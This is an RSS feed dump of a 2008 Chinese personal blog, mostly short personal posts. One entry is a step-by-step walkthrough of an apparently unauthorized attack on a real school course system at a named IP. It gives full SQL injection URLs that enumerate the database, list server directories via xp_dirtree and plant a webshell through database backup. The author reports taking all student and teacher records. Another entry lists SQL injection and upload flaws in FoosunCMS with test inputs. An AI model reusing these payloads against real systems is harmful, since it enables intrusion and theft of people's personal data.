http://www.xuyunfeng.com.cn/ PJBlog3 2008-06-15T16:19:32+08:00 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-06-15T16:19:32+08:00 2008-06-15T16:19:32+08:00

   对不起朋友们,最近因为工作原因不能更新博客,有的朋友说软件不能下载,
可以在网上搜索一下嘛!
       可能明年才有时间来管理博客了! ]]>

http://www.xuyunfeng.com.cn/default.asp?id=203 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-05-04T16:51:21+08:00 2008-05-04T16:51:21+08:00

下次改软件的时候,一定改进!!

]]>

http://www.xuyunfeng.com.cn/default.asp?id=202 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-04-25T06:01:15+08:00 2008-04-25T06:01:15+08:00

http://dx.3800hk.com/vipdown/vipdown/v09/200804/22706.html]]>

http://www.xuyunfeng.com.cn/default.asp?id=201 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-04-25T01:16:54+08:00 2008-04-25T01:16:54+08:00

都认为我过得好,很逍遥,很自在，什么也不用愁，也不用担心什么，其实他们没有想过天天对着代码是什么
感受，在学校的压力很大，不知道该何去何从，经常迷失方向，一些还追着加我，说这个软件不能用，那个
软件不能用，他们都不知道我测试软件花了很多时间，不能用怎么会发出去，虽然也会有很多BUG，但都是
测试后改过的，还围到软件不能下载，而埋怨我，不知道我说了好多次，以前放软件的服务器删了，可以到
网上去搜索一下，就可以了，烦啊！]]>

http://www.xuyunfeng.com.cn/default.asp?id=200 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-04-21T00:42:11+08:00 2008-04-21T00:42:11+08:00

]]>

http://www.xuyunfeng.com.cn/default.asp?id=199 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-04-18T23:07:48+08:00 2008-04-18T23:07:48+08:00

没什么技术含量,别见笑!呵呵,开始了,1.先判断是否存在注入:在地址后面打上'
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'

有防注入系统,限制了我的IP,现在就可以用COOKIES注入器
进入注入:


填写相应信息,生成1.asp,放到我服务器上次,地址是:http://www.xuyunfeng.com.cn/1.asp
加上参数为:http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048
现在尝试注入;http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048'

提示出错,试了一下不能注入,到了这里一般的朋友都放弃了,现在我们回到原来的注入点
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048一:暴数据库信息:
1.判断数据库名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20db_name()>0%20and%20''='

暴出数据库名为:wlxt
2.判断数据库用户名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20user>0%20and%20''='

数据库名为:wlxt136
3.判断数据库权限:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20and%20''='

暴出用户权限是:DB的,DB权限可以列目录，现在我们来列网站目录
二:列网站目录
1.创建表:xuyunfeng列C盘的文件和目录
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048';Drop%20TABLE%20xuyufeng;Create%20TABLE%20xuyunfeng(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20xuyunfeng%20exec%20master..xp_dirtree%20"C:\",%201,1--

提示防注入系统,不用管它,创建表成功
2:暴出C盘的文件和目录个数
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20xuyunfeng)=0%20%20and%20''='

暴出一共有13个目录和文件
3.列出第一个文件和目录(目录前面有0)
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第一个目录为:ASFRoot
4:列出第二个文件或目录:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第二个目录名为:Config.Msi
5.列第三个文件或目录名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%203%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第三个目录为:Documents and Settings
依次这样列出C盘的所有目录和文件,依次可以列所网站的所有目录和文件,从而找到网站
我已经找到了:d:\webroot\wlxt\现在拿到数据库的信息和网站目录,现在可以通过数据库备份
写上一句话木马:
三:上传木马:
1.用到工具,DB备份工具

把得到的信息写到软件里,依次点击备份,不要管提示,我们看是否成功!

备份成功了，现在用一个免杀大马


点"给我冲进去"看是否成功!
http://218.6.168.52/wlxt/help.asp

成功了,输入密码进入!

我们成功拿到webshell,结束了这次检测!

我用工具拿到了整个数据库:包括所有学生和所有老师的信息,上面是所有老师的信息,但我们不能触犯法律,只是起技术的研究,有些并不是完全相同,好就到这了!
]]>

http://www.xuyunfeng.com.cn/default.asp?id=198 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-04-15T04:45:31+08:00 2008-04-15T04:45:31+08:00

,我的软件全在上面,今天想用PG多格一个盘出来,没想到,我却一下点错了,整个移动硬盘的数据全没
了,真的气人,看来还是光盘安全!!!]]>

http://www.xuyunfeng.com.cn/default.asp?id=197 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-04-13T10:05:12+08:00 2008-04-13T10:05:12+08:00

]]>

http://www.xuyunfeng.com.cn/default.asp?id=196 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-04-06T05:59:44+08:00 2008-04-06T05:59:44+08:00

今日来分析一下风讯的产品的安全性。
风讯管方最新下载，FoosunCMSv4.0sp5完整版(含模板)。安装后，查看了一下代码，发现多处SQL 注入。不由心地发出一句：这样的产品，你敢用吗？
对于ASP版。
1、漏洞文件

/User/i_Blog/Public_Save.asp
38行 p_FileName = Request.Form("FileName")
53行 set rstf = User_Conn.execute("select FileName,FileExtName From FS_ME_Infoilog where UserNumber='"
s_User.UserNumber"' and FileName='"&p_FileName"' and FileExtName='"&P_FileExtName"'")

变量没有过虑就进入数据库查询
测试方法
http://localhost/User/i_Blog/PublicLog.asp

在文件名那输入 test' 保存后出现

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'UserNumber='290149F916J' and FileName='test'' and FileExtName='html'' 中。

/User/i_Blog/Public_Save.asp, 第 53 行

2、漏洞文件

/user/Reg_Contact.asp

51 p_C_Name = Request.Form("C_Name")
85 AddCorpDataTFObj.open "select C_Name From FS_ME_CorpUser where C_Name = '"&
p_C_Name "'",User_Conn,1,3

也明显存在sql注入漏洞


40 p_RealName = Replace(Request.Form("RealName"),"''","")
115 AddUserDataTFObj.open "select UserName,Email From FS_ME_Users where UserName
= '"& p_UserName_1 "'",User_Conn,1,3


sql注入漏洞


3、user/Photo_Class.asp
26 rs.open "select title,id,UserNumber From FS_ME_PhotoClass where
title='"&trim(Request.Form("title"))"' and UserNumber='"&Fs_User.UserNumber"'",User_Conn,1,3

title 没有过虑就直接进入数据库
测试方法
http://localhost/user/Photo_Class.asp?Action=add


在相册分类名称那加入SQL注入语句 test'
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'title='test'' and UserNumber='290149F916J'' 中。

/user/Photo_Class.asp, 第 26 行

4、Order_Pay.asp


14 User_Conn.execute("Delete From FS_ME_Order where orderNumber='"&
equest.QueryString("OrderNumber")"' and UserNumber='"& Fs_User.UserNumber "'")

orderNumber 没有过虑
测试方法
http://localhost/User/Order_Pay.asp?action=lock_order&OrderNumber=4'


Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'OrderNumber='4'' and UserNumber='290149F916J'' 中。

/User/Order_Pay.asp, 第 14 行

5、OpenCorp.asp


39 p_C_Name = Request.Form("C_Name")
62 AddCorpDataTFObj.open "select C_Name From FS_ME_CorpUser where
C_Name = '"& p_C_Name "' and usernumber<>'"&session("fS_usernumber")"'",User_Conn,1,3

6、Message_box.asp

29 DelID = request.Form("MessageID")
35 User_Conn.execute("Delete From FS_ME_Message where MessageId in ("&DelID")
and M_ReadUserNumber ='"& Fs_User.UserNumber"'")

随便一看，就SQL注入就那么多。其它的漏洞呢？
一个SQL注入漏洞就能把网站黑掉。晕。。这样的系统还敢用吗？

对于最新的.net 版 风讯dotNETCMS v1.0
随便看了一下，也存在很严重的漏洞
editor\editor\filemanager\connectors\aspx
connector.aspx
upload.aspx
这两个文件都存在上传漏洞。
很容易上传木马

下面是对风讯管方网站的入侵测试




不敢用风讯系统了吧？（注：以上只是本人友情测试）

]]>

http://www.xuyunfeng.com.cn/default.asp?id=195 许云风 http://www.xuyunfeng.com.cn/ xuyunfeng@xuyunfeng.com.cn 2008-04-06T05:09:07+08:00 2008-04-06T05:09:07+08:00

]]>

http://www.xuyunfeng.com.cn/default.asp?id=194